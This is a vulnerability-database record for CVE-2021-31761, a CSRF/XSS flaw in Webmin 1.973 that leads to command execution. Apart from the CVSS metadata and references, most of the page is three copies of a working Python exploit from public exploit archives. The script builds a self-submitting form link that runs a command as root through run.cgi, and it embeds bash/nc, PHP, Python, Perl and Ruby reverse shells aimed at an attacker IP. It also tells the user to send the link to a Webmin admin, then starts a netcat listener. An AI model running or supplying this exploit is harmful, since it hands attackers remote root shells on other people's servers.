Description
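Webmin 1.973 is affected by a reflected Cross-Site Scripting (XSS) vulnerability that can be leveraged to achieve Remote Command Execution through Webmin's running process feature. The CVSS v3.1 vector in the record below marks user interaction as required (UI:R), and the related exploit-database entries describe the same issue as a Cross-Site Request Forgery (CSRF) against 'run.cgi'.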
Affected Software
Related
{"id": "CVE-2021-31761", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-31761", "description": "Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature.", "published": "2021-04-25T19:15:00", "modified": "2021-12-08T20:26:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.8}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31761", "reporter": "cve@mitre.org", "references": ["https://youtu.be/23VvUMu-28c", "https://github.com/electronicbots/CVE-2021-31761", "https://github.com/Mesh3l911/CVE-2021-31761", "https://github.com/webmin/webmin", "http://packetstormsecurity.com/files/163559/Webmin-1.973-Cross-Site-Request-Forgery.html"], "cvelist": ["CVE-2021-31761"], "immutableFields": [], "lastseen": "2022-03-23T18:08:01", "viewCount": 63, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50144"]}, {"type": "githubexploit", "idList": ["80853E7D-3590-5E87-AD43-378E0461B3EB", 
"DEAFBFA5-F25C-5046-9615-A5F337FCF2E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163559"]}, {"type": "zdt", "idList": ["1337DAY-ID-36572"]}], "rev": 4}, "score": {"value": 3.5, "vector": "NONE"}, "twitter": {"counter": 6, "modified": "2021-04-29T09:46:37", "tweets": [{"link": "https://twitter.com/WolfgangSesin/status/1387445279952080897", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-31761 (webmin)) has been published on https://t.co/9r7dQ32z5h?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1387445279952080897", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-31761 (webmin)) has been published on https://t.co/9r7dQ32z5h?amp=1"}, {"link": "https://twitter.com/FortifiedITLtd/status/1388116283259080705", "text": "CVE-2021-31761\nWebmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature."}, {"link": "https://twitter.com/threatintelctr/status/1417522371871838211", "text": " NEW: CVE-2021-31761 Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature. 
Severity: CRITICAL https://t.co/F5V7BTUfSv?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1387445287086555136", "text": "New post from https://t.co/9KYxtdHHVL?amp=1 (CVE-2021-31761 (webmin)) has been published on https://t.co/Gp0SoTa7tL?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1387445287086555136", "text": "New post from https://t.co/9KYxtdHHVL?amp=1 (CVE-2021-31761 (webmin)) has been published on https://t.co/Gp0SoTa7tL?amp=1"}]}, "backreferences": {"references": [{"type": "canvas", "idList": ["WEBMIN"]}, {"type": "exploitdb", "idList": ["EDB-ID:50144"]}, {"type": "githubexploit", "idList": ["80853E7D-3590-5E87-AD43-378E0461B3EB", "DEAFBFA5-F25C-5046-9615-A5F337FCF2E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163559"]}, {"type": "zdt", "idList": ["1337DAY-ID-36572"]}]}, "exploitation": null, "vulnersScore": 3.5}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:webmin:webmin:1.973"], "cpe23": ["cpe:2.3:a:webmin:webmin:1.973:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "affectedSoftware": [{"cpeName": "webmin:webmin", "version": "1.973", "operator": "eq", "name": "webmin"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:webmin:webmin:1.973:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://youtu.be/23VvUMu-28c", "name": "https://youtu.be/23VvUMu-28c", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/electronicbots/CVE-2021-31761", "name": "https://github.com/electronicbots/CVE-2021-31761", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Mesh3l911/CVE-2021-31761", "name": "https://github.com/Mesh3l911/CVE-2021-31761", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": 
"https://github.com/webmin/webmin", "name": "https://github.com/webmin/webmin", "refsource": "MISC", "tags": ["Product", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/163559/Webmin-1.973-Cross-Site-Request-Forgery.html", "name": "http://packetstormsecurity.com/files/163559/Webmin-1.973-Cross-Site-Request-Forgery.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"packetstorm": [{"lastseen": "2021-07-20T17:19:32", "description": "", "cvss3": {}, "published": "2021-07-20T00:00:00", "type": "packetstorm", "title": "Webmin 1.973 Cross Site Request Forgery", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-31761"], "modified": "2021-07-20T00:00:00", "id": "PACKETSTORM:163559", "href": "https://packetstormsecurity.com/files/163559/Webmin-1.973-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF) \n# Date: 24/04/2021 \n# Exploit Author: Mesh3l_911 & Z0ldyck \n# Vendor Homepage: https://www.webmin.com \n# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761 \n# Version: Webmin 1.973 \n# Tested on: All versions <= 1.973 \n# CVE: CVE-2021-31761 \n# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to \n# get a Remote Command Execution (RCE) through the Webmin's running process \n# feature \n \nimport time, subprocess,random,urllib.parse \n \n \nprint('''\\033[1;37m \n \n__ __ _ ____ _ _________ _ _ _ \n| \\/ | | | |___ \\| | |___ / _ \\| | | | | | \n| \\ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ \n| |\\/| |/ _ \\/ __| '_ \\ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / \n| | | | __/\\__ \\ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < \n|_| |_|\\___||___/_| |_|____/|_| (_|_) /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/ \n__/ | \n|___/ \n \n\\033[1;m''') \n \nfor i in range(101): \nprint( \n\"\\r\\033[1;36m [>] POC By \\033[1;m \\033[1;37mMesh3l\\033[1;m \\033[1;36m ( \\033[1;m\\033[1;37m@Mesh3l_911\\033[1;m\\033[1;36m ) & \\033[1;m \\033[1;37mZ0ldyck\\033[1;m\\033[1;36m ( \\033[1;m\\033[1;37m@electronicbots\\033[1;m\\033[1;36m ) \\033[1;m {} \\033[1;m\".format( \ni), \"\\033[1;36m%\\033[1;m\", end=\"\") \ntime.sleep(0.02) \nprint(\"\\n\\n\") \n \ntarget = input( \n\"\\033[1;36m \\n Please input ur target's webmin path e.g. 
( https://webmin.Mesh3l-Mohammed.com/ ) > \\033[1;m\") \n \nif target.endswith('/'): \ntarget = target + 'tunnel/link.cgi/' \nelse: \ntarget = target + '/tunnel/link.cgi/' \n \nip = input(\"\\033[1;36m \\n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \\033[1;m\") \n \nport = input(\"\\033[1;36m \\n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \\033[1;m\") \n \nReverseShell = input \\ \n('''\\033[1;37m \n\\n \n1- Bash Reverse Shell \\n \n2- PHP Reverse Shell \\n \n3- Python Reverse Shell \\n \n4- Perl Reverse Shell \\n \n5- Ruby Reverse Shell \\n \n\\033[1;m \n \n\\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \\033[1;m''') \n \nfile_name = random.randrange(1000) \n \nif ReverseShell == '1': \nReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+'' \n \nelif ReverseShell == '2': \nReverseShell = ''' php -r '$sock=fsockopen(\"''' + ip + '''\",''' + port + ''');exec(\"/bin/sh -i <&3 >&3 2>&3\");' ''' \n \nelif ReverseShell == '3': \nReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"''' + ip + '''\",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' ''' \n \nelif ReverseShell == '4': \nReverseShell = ''' perl -e 'use Socket;$i=\"''' + ip + '''\";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' ''' \n \nelif ReverseShell == '5': \nReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open(\"''' + ip + '''\",''' + port + ''').to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' ''' \n \nelse: \nprint(\"\\033[1;36m \\n Please Re-Check ur input :( \\033[1;m \\n\") \n \n \ndef CSRF_Generator(): 
\nPayload = urllib.parse.quote(''' \n \n<html> \n<head> \n<meta name=\"referrer\" content=\"never\"> \n</head> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"/proc/run.cgi\" method=\"POST\"> \n<input type=\"hidden\" name=\"cmd\" value=\"''' + ReverseShell + '''\" /> \n<input type=\"hidden\" name=\"mode\" value=\"0\" /> \n<input type=\"hidden\" name=\"user\" value=\"root\" /> \n<input type=\"hidden\" name=\"input\" value=\"\" /> \n<input type=\"hidden\" name=\"undefined\" value=\"\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n<script> \ndocument.forms[0].submit(); \n</script> \n</body> \n \n</html> \n \n''') \n \nprint(\"\\033[1;36m\\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \\n \\n\\033[1;m\") \n \nprint(target+Payload) \n \ndef Netcat_listener(): \nprint() \nsubprocess.run([\"nc\", \"-nlvp \"+port+\"\"]) \n \n \ndef main(): \nCSRF_Generator() \nNetcat_listener() \n \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163559/webmin1973-xsrfexec.txt", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-15T15:38:34", "description": "# CVE-2021-31761\n\n# Description :\n<b>Exploiting a Reflected Cros...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-21T20:00:09", "type": "githubexploit", "title": "Exploit for Cross-site Scripting in Webmin", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31761"], "modified": "2021-12-15T14:41:56", "id": "80853E7D-3590-5E87-AD43-378E0461B3EB", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:21:33", "description": "# ..| CVE-2021-31761 |..\n\n# Description :\n<b>Exploiting a Reflec...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-21T19:46:43", "type": "githubexploit", "title": "Exploit for Cross-site Scripting in Webmin", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31761"], "modified": "2021-06-20T03:50:26", "id": "DEAFBFA5-F25C-5046-9615-A5F337FCF2E7", "href": "", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "zdt": [{"lastseen": "2021-12-04T15:52:23", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-20T00:00:00", "type": "zdt", "title": "Webmin 1.973 - (run.cgi) Cross-Site Request Forgery Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31761"], "modified": "2021-07-20T00:00:00", "id": "1337DAY-ID-36572", "href": "https://0day.today/exploit/description/36572", "sourceData": "# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)\n# Exploit Author: Mesh3l_911 & Z0ldyck\n# Vendor Homepage: https://www.webmin.com\n# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761\n# Version: Webmin 1.973\n# Tested on: All versions <= 1.973\n# CVE: CVE-2021-31761\n# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to\n# get a Remote Command Execution (RCE) through the Webmin's running process\n# feature\n\nimport time, subprocess,random,urllib.parse\n\n\nprint('''\\033[1;37m\n\n __ __ _ ____ _ _________ _ _ _ \n| \\/ | | | |___ \\| | |___ / _ \\| | | | | | \n| \\ / | ___ 
___| |__ __) | | / / | | | | __| |_ _ ___| | __\n| |\\/| |/ _ \\/ __| '_ \\ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /\n| | | | __/\\__ \\ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < \n|_| |_|\\___||___/_| |_|____/|_| (_|_) /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/\n __/ | \n |___/ \n\n \\033[1;m''')\n\nfor i in range(101):\n print(\n \"\\r\\033[1;36m [>] POC By \\033[1;m \\033[1;37mMesh3l\\033[1;m \\033[1;36m ( \\033[1;m\\033[1;[email\u00a0protected]_911\\033[1;m\\033[1;36m ) & \\033[1;m \\033[1;37mZ0ldyck\\033[1;m\\033[1;36m ( \\033[1;m\\033[1;[email\u00a0protected]\\033[1;m\\033[1;36m ) \\033[1;m {} \\033[1;m\".format(\n i), \"\\033[1;36m%\\033[1;m\", end=\"\")\n time.sleep(0.02)\nprint(\"\\n\\n\")\n\ntarget = input(\n \"\\033[1;36m \\n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \\033[1;m\")\n\nif target.endswith('/'):\n target = target + 'tunnel/link.cgi/'\nelse:\n target = target + '/tunnel/link.cgi/'\n\nip = input(\"\\033[1;36m \\n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \\033[1;m\")\n\nport = input(\"\\033[1;36m \\n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \\033[1;m\")\n\nReverseShell = input \\\n('''\\033[1;37m\n\\n\n1- Bash Reverse Shell \\n\n2- PHP Reverse Shell \\n\n3- Python Reverse Shell \\n\n4- Perl Reverse Shell \\n\n5- Ruby Reverse Shell \\n\n\\033[1;m\n\n\\033[1;36mPlease insert the number Reverse Shell's type u want e.g. 
( 1 ) > \\033[1;m''')\n\nfile_name = random.randrange(1000)\n\nif ReverseShell == '1':\n ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''\n\nelif ReverseShell == '2':\n ReverseShell = ''' php -r '$sock=fsockopen(\"''' + ip + '''\",''' + port + ''');exec(\"/bin/sh -i <&3 >&3 2>&3\");' '''\n\nelif ReverseShell == '3':\n ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"''' + ip + '''\",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' '''\n\nelif ReverseShell == '4':\n ReverseShell = ''' perl -e 'use Socket;$i=\"''' + ip + '''\";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' '''\n\nelif ReverseShell == '5':\n ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open(\"''' + ip + '''\",''' + port + ''').to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' '''\n\nelse:\n print(\"\\033[1;36m \\n Please Re-Check ur input :( \\033[1;m \\n\")\n\n\ndef CSRF_Generator():\n Payload = urllib.parse.quote('''\n\n<html>\n <head>\n <meta name=\"referrer\" content=\"never\">\n </head>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action=\"/proc/run.cgi\" method=\"POST\">\n <input type=\"hidden\" name=\"cmd\" value=\"''' + ReverseShell + '''\" />\n <input type=\"hidden\" name=\"mode\" value=\"0\" />\n <input type=\"hidden\" name=\"user\" value=\"root\" />\n <input type=\"hidden\" name=\"input\" value=\"\" />\n <input type=\"hidden\" name=\"undefined\" value=\"\" />\n <input type=\"submit\" value=\"Submit request\" />\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n\n</html>\n\n ''')\n\n print(\"\\033[1;36m\\nHere's ur link 
, send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \\n \\n\\033[1;m\")\n\n print(target+Payload)\n\ndef Netcat_listener():\n print()\n subprocess.run([\"nc\", \"-nlvp \"+port+\"\"])\n\n\ndef main():\n CSRF_Generator()\n Netcat_listener()\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/36572", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:36:30", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-07-20T00:00:00", "type": "exploitdb", "title": "Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-31761", "CVE-2021-31761"], "modified": "2021-07-20T00:00:00", "id": "EDB-ID:50144", "href": "https://www.exploit-db.com/exploits/50144", "sourceData": "# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)\r\n# Date: 24/04/2021\r\n# Exploit Author: Mesh3l_911 & Z0ldyck\r\n# Vendor Homepage: https://www.webmin.com\r\n# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761\r\n# Version: Webmin 
1.973\r\n# Tested on: All versions <= 1.973\r\n# CVE: CVE-2021-31761\r\n# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to\r\n# get a Remote Command Execution (RCE) through the Webmin's running process\r\n# feature\r\n\r\nimport time, subprocess,random,urllib.parse\r\n\r\n\r\nprint('''\\033[1;37m\r\n\r\n __ __ _ ____ _ _________ _ _ _ \r\n| \\/ | | | |___ \\| | |___ / _ \\| | | | | | \r\n| \\ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __\r\n| |\\/| |/ _ \\/ __| '_ \\ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /\r\n| | | | __/\\__ \\ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < \r\n|_| |_|\\___||___/_| |_|____/|_| (_|_) /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/\r\n __/ | \r\n |___/ \r\n\r\n \\033[1;m''')\r\n\r\nfor i in range(101):\r\n print(\r\n \"\\r\\033[1;36m [>] POC By \\033[1;m \\033[1;37mMesh3l\\033[1;m \\033[1;36m ( \\033[1;m\\033[1;37m@Mesh3l_911\\033[1;m\\033[1;36m ) & \\033[1;m \\033[1;37mZ0ldyck\\033[1;m\\033[1;36m ( \\033[1;m\\033[1;37m@electronicbots\\033[1;m\\033[1;36m ) \\033[1;m {} \\033[1;m\".format(\r\n i), \"\\033[1;36m%\\033[1;m\", end=\"\")\r\n time.sleep(0.02)\r\nprint(\"\\n\\n\")\r\n\r\ntarget = input(\r\n \"\\033[1;36m \\n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \\033[1;m\")\r\n\r\nif target.endswith('/'):\r\n target = target + 'tunnel/link.cgi/'\r\nelse:\r\n target = target + '/tunnel/link.cgi/'\r\n\r\nip = input(\"\\033[1;36m \\n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \\033[1;m\")\r\n\r\nport = input(\"\\033[1;36m \\n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \\033[1;m\")\r\n\r\nReverseShell = input \\\r\n('''\\033[1;37m\r\n\\n\r\n1- Bash Reverse Shell \\n\r\n2- PHP Reverse Shell \\n\r\n3- Python Reverse Shell \\n\r\n4- Perl Reverse Shell \\n\r\n5- Ruby Reverse Shell \\n\r\n\\033[1;m\r\n\r\n\\033[1;36mPlease insert the number Reverse Shell's type u want e.g. 
( 1 ) > \\033[1;m''')\r\n\r\nfile_name = random.randrange(1000)\r\n\r\nif ReverseShell == '1':\r\n ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''\r\n\r\nelif ReverseShell == '2':\r\n ReverseShell = ''' php -r '$sock=fsockopen(\"''' + ip + '''\",''' + port + ''');exec(\"/bin/sh -i <&3 >&3 2>&3\");' '''\r\n\r\nelif ReverseShell == '3':\r\n ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"''' + ip + '''\",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' '''\r\n\r\nelif ReverseShell == '4':\r\n ReverseShell = ''' perl -e 'use Socket;$i=\"''' + ip + '''\";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' '''\r\n\r\nelif ReverseShell == '5':\r\n ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open(\"''' + ip + '''\",''' + port + ''').to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' '''\r\n\r\nelse:\r\n print(\"\\033[1;36m \\n Please Re-Check ur input :( \\033[1;m \\n\")\r\n\r\n\r\ndef CSRF_Generator():\r\n Payload = urllib.parse.quote('''\r\n\r\n<html>\r\n <head>\r\n <meta name=\"referrer\" content=\"never\">\r\n </head>\r\n <body>\r\n <script>history.pushState('', '', '/')</script>\r\n <form action=\"/proc/run.cgi\" method=\"POST\">\r\n <input type=\"hidden\" name=\"cmd\" value=\"''' + ReverseShell + '''\" />\r\n <input type=\"hidden\" name=\"mode\" value=\"0\" />\r\n <input type=\"hidden\" name=\"user\" value=\"root\" />\r\n <input type=\"hidden\" name=\"input\" value=\"\" />\r\n <input type=\"hidden\" name=\"undefined\" value=\"\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n <script>\r\n 
document.forms[0].submit();\r\n </script>\r\n </body>\r\n\r\n</html>\r\n\r\n ''')\r\n\r\n print(\"\\033[1;36m\\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \\n \\n\\033[1;m\")\r\n\r\n print(target+Payload)\r\n\r\ndef Netcat_listener():\r\n print()\r\n subprocess.run([\"nc\", \"-nlvp \"+port+\"\"])\r\n\r\n\r\ndef main():\r\n CSRF_Generator()\r\n Netcat_listener()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50144", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}